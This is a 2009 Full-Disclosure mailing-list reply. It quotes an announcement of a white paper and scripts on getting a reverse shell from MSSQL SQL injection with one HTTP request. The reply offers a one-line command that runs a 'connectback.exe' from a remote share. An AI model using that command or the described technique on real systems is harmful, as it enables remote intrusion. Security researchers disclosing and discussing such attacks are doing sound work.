Or just 'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable. But Fredrick is sure that your 20 page write-up was fantastically entertaining. On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<fer...@mavituna.com> wrote: > This is a different and more practical approach to get a reverse shell > or code execution in SQL Injections (particularly in MSSQL). The idea > is simple. Getting a reverse shell from an SQL Injection with one HTTP > request without using an extra channel such as TFTP, FTP to upload the > initial payload. > > White paper explains the steps and the details of the attack. Scripts > got all the tools you need to create your HTTP request with your own > payload. > > > White Paper: > http://ferruh.mavituna.com/papers/oneclickownage.pdf > > Scripts: > http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip > > Presentation (IT Underground 2009): > http://www.slideshare.net/fmavituna/one-click-ownage-1660539 > > > > Regards, > > > -- > http://ferruh.mavituna.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
